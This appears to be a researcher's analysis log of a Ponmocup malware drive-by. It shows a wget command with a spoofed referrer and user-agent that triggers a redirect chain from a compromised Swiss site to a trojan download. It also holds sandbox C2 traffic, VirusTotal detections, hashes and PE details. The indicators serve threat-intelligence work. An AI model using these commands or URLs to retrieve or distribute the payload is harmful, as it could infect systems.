For general info about the Ponmocup malware / botnet please see: http://www9.dyndns-server.com:8080/pub/botnet-links.html $ wget -S -v --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8)" --referer="http://www.google.ch/search?hl=de&q=www+gega+ch&aq=f&aqi=g10&aql=&oq=" http://www.gega.ch/index2.htm -O www.gega.ch --14:23:34-- http://www.gega.ch/index2.htm => `www.gega.ch' Resolving www.gega.ch... 92.43.216.118 Connecting to www.gega.ch|92.43.216.118|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 302 Found Connection: keep-alive Date: Thu, 30 Jun 2011 12:23:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://twowayserf.com/cgi-bin/r.cgi?p=15003&i=facca479&j=318&m=e0caf80392b339b45a8c1a76444af215&h=www.gega.ch&u=/index2.htm&q=&t=30.06.2011%2014:23:34 Content-Length: 336 Content-type: text/html Location: http://twowayserf.com/cgi-bin/r.cgi?p=15003&i=facca479&j=318&m=e0caf80392b339b45a8c1a76444af215&h=www.gega.ch&u=/index2.htm&q=&t=30.06.2011%2014:23:34 [following] --14:23:34-- http://twowayserf.com/cgi-bin/r.cgi?p=15003&i=facca479&j=318&m=e0caf80392b339b45a8c1a76444af215&h=www.gega.ch&u=/index2.htm&q=&t=30.06.2011%2014:23:34 => `www.gega.ch' Resolving twowayserf.com... 84.16.234.150 Connecting to twowayserf.com|84.16.234.150|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 302 Moved Temporarily Server: Apache/1.3.42 Date: Thu, 30 Jun 2011 12:23:35 GMT Connection: close Location: http://protection1.therealityglove.com/se/3da49bea8f9c52ed6b9b49c68897e5f48a7141f2a345689bcbde32cfed7f76267b92e122de0df2c767ec0cd97426e07f4a1b36a6f463244bc7c2e2bc9cddbc/6e23d5f/www_gega_ch.com Location: http://protection1.therealityglove.com/se/3da49bea8f9c52ed6b9b49c68897e5f48a7141f2a345689bcbde32cfed7f76267b92e122de0df2c767ec0cd97426e07f4a1b36a6f463244bc7c2e2bc9cddbc/6e23d5f/www_gega_ch.com [following] --14:23:35-- http://protection1.therealityglove.com/se/3da49bea8f9c52ed6b9b49c68897e5f48a7141f2a345689bcbde32cfed7f76267b92e122de0df2c767ec0cd97426e07f4a1b36a6f463244bc7c2e2bc9cddbc/6e23d5f/www_gega_ch.com => `www.gega.ch' Resolving protection1.therealityglove.com... 95.168.177.142 Connecting to protection1.therealityglove.com|95.168.177.142|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: Apache/1.3.42 Date: Thu, 30 Jun 2011 12:23:36 GMT Content-Type: application/x-msdownload Connection: close Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="www_gega_ch.com" Content-Length: 403383 Content-Transfer-Encoding: binary Accept-Ranges: none Length: 403,383 (394K) [application/x-msdownload] 100%[==================================================================================================================>] 403,383 1.44M/s 14:23:37 (1.44 MB/s) - `www.gega.ch' saved [403383/403383] Anubis: http://anubis.iseclab.org/?action=result&task_id=19c898bc16ff574f47110a25ce7c672f2&format=html - HTTP Conversations: From ANUBIS:1028 to 78.159.100.32:80 - [surfacechicago.net] Request: GET /html/license_43EC922A3D0E1F403834ED406BA8085A686E606DF596C71B1F47B22D93555C332C0C0719D7D5C142B8C2C3E65DCC50966E34BA8C4D56463B02F3FED9544A9D2924CF3F64589D6F1B6AEE7B83E9738A11F3A7C664F6BC84AA1B5B4824A007F3FD85586DDE35D8DFD83C52EF01BB4FC51EFA610EB05E9F31AACE0A4CE3F967AF4758E93775E2175873776B41C6B8B8E477551AC5DF821A2A30780101FAF813B0E0A5703F759B3C706981FD4A7869895157E39ED3AA844149D42318C1889EA4154625D988CD8E00FAE64FB6CD1A8B4980B2FDAA3A963707F0454AB9697C1861AC5B1A8A5B80C9A8349D67AA22D35E7D97A419B642773926FB9F0382AAFF9F800397340CD84A677BC8EBC7EB45D3FE9A1BF368EFFEE0FB69DCF5A74CC14D87B121909C9E0DC4C3931749D5EAFA2C1AC1F9CCBE46D0B108A71EE3DCE0F72064E86D5367EBA25E3A2E7BD20951E9F1E83C1C39BAADE24B9D8CABE60E179F194A8D45AC37C1DD7DC0D42B2B1DCC88B1FE4E04FC0C125C603F2F37BF6813FE63836B.html Response: 404 "Not Found" From ANUBIS:1029 to 78.159.100.32:80 - [surfacechicago.net] Request: GET /html/license_43EC922A3D0E1F403834ED406BA8085A686E606DF596C71B1F47B22D93555C332C0C0719D7D5C142B8C2C3E65DCC50966E34BA8C4D56463B02F3FED9544A9D2924CF3F64589D6F1B6AEE7B83E9738A11F3A7C664F6BC84AA1B5B4824A007F3FD85586DDE35D8DFD83C52EF01BB4FC51EFA610EB05E9F31AACE0A4CE3F967AF4758E93775E2175873776B41C6B8B8E477551AC5DF821A2A30780101FAF813B0E0A5703F759B3C706981FD4A7869895157E39ED3AA844149D42318C1889EA4154625D988CD8E00FAE64FB6CD1A8B4980B2FDAA3A963707F0454AB9697C1861AC5B1A8A5B80C9A8349D67AA22D35E7D97A419B642773926FB9F0382AAFF9F800397340CD84A677BC8EBC7EB45D3FE9A1BF368EFFEE0FB69DCF5A74CC14D87B121909C9E0DC4C3931749D5EAFA2C1AC1F9CCBE46D0B108A71EE3DCE0F72064E86D5367EBA25E3A2E7BD20951E9F1E83C1C39BAADE24B9D8CABE60E179F194A8D45AC37C1DD7DC0D42B2B1DCC88B1FE4E04FC0C125C603F2F37BF6813FE63836BA5B8F0D55770FFC3827E9F341618A7E07D5E0ABD6F0EAB830B6DE55252F3ADE7D9235D87C3A7FE6A776095DC10078F0C241F838B9E7D51CE52D48D81BD162BE10288C8C32826CAE9F179C760E8566ACC60DA4F924031E6C0C7C653B617AA466909FBDD76D21294A2520CE410C0273F8726257A4BD100FDB4F336F0FA070E4E3CC90247F213962E7A537FA68F7513BA5C830B88FED3C2E4AB8950DDA9A932B5BDA040573370DF6404CFCFA7055A4FE5B5133B7D7583E8CB686F5E83EE427439B323C2D5220D3885FA3DED5DEEDFAF0E530F4622B344BBC8FB8D2888A86FF2AE62337DDE644F0902C55DBF21B70135A517AE4FA3572D75C149AA6A8BD3A755.html Response: 404 "Not Found" VT report: https://www.virustotal.com/file-scan/report.html?id=3631e9b8aa459ab29a8b64cd0a7a422d2da7539e38c3057ceef7bf5543cd9bea-1309436638 File name: www_gega_ch.com Submission date: 2011-06-30 12:23:58 (UTC) Result: 7/ 42 (16.7%) BitDefender 7.2 2011.06.30 Gen:Variant.Kazy.15607 F-Secure 9.0.16440.0 2011.06.30 Gen:Variant.Kazy.15607 GData 22 2011.06.30 Gen:Variant.Kazy.15607 Ikarus T3.1.1.104.0 2011.06.30 Trojan.Win32.Pirminay Norman 6.07.10 2011.06.30 W32/Obfuscated.L nProtect 2011-06-30.01 2011.06.30 Gen:Variant.Kazy.15607 Panda 10.0.3.5 2011.06.30 Suspicious file MD5 : a8def263652676b550af0295413075bb SHA1 : 9ddd348ee686d3c4b0371e247c275aaef0d7d4ae SHA256: 3631e9b8aa459ab29a8b64cd0a7a422d2da7539e38c3057ceef7bf5543cd9bea ssdeep: 12288:Bzo3MzVRdRRHNBMN170x0fE5HWUR+QBES3y:BzLVvRd0N1QE0Z+0ESi File size : 403383 bytes First seen: 2011-06-30 12:23:58 Last seen : 2011-06-30 12:23:58 TrID: UPX compressed Win32 Executable (39.5%) Win32 EXE Yoda's Crypter (34.3%) Win32 Executable Generic (11.0%) Win32 Dynamic Link Library (generic) (9.8%) Generic Win/DOS Executable (2.5%) sigcheck: publisher....: Enuvbdmkt Rdomvsatslx copyright....: Copyright (C) Kpcnynwee Corp. 1981-1999 product......: Pnbplieqe(R) Cscqpzm (R) 2000 Llgmbgilr Lewjht description..: Wireless Zero Configuration Service UI original name: wzcdlg.dll internal name: wzcdlg.dll file version.: 5.00.2195.6604 comments.....: n/a signers......: - signing date.: - verified.....: Unsigned packers (F-Prot): UPX PEInfo: PE structure information [[ basic data ]] entrypointaddress: 0xE46B0 timedatestamp....: 0x4A4E60C0 (Fri Jul 03 19:49:20 2009) machinetype......: 0x14c (I386) [[ 3 section(s) ]] name, viradd, virsiz, rawdsiz, ntropy, md5 UPX0, 0x1000, 0x82000, 0x0, 0.00, d41d8cd98f00b204e9800998ecf8427e UPX1, 0x83000, 0x62000, 0x61A00, 7.88, 3f2ec746fedeff6c513ae3217b1d5613 .rsrc, 0xE5000, 0x1000, 0x800, 3.45, d52b1609573b0b25b444240d631622f6 [[ 7 import(s) ]] KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess ADVAPI32.dll: RegCloseKey GDI32.dll: BitBlt MSVCRT.dll: exit ole32.dll: CoTaskMemFree RPCRT4.dll: NdrDllGetClassObject USER32.dll: GetDC Symantec reputation:Suspicious.Insight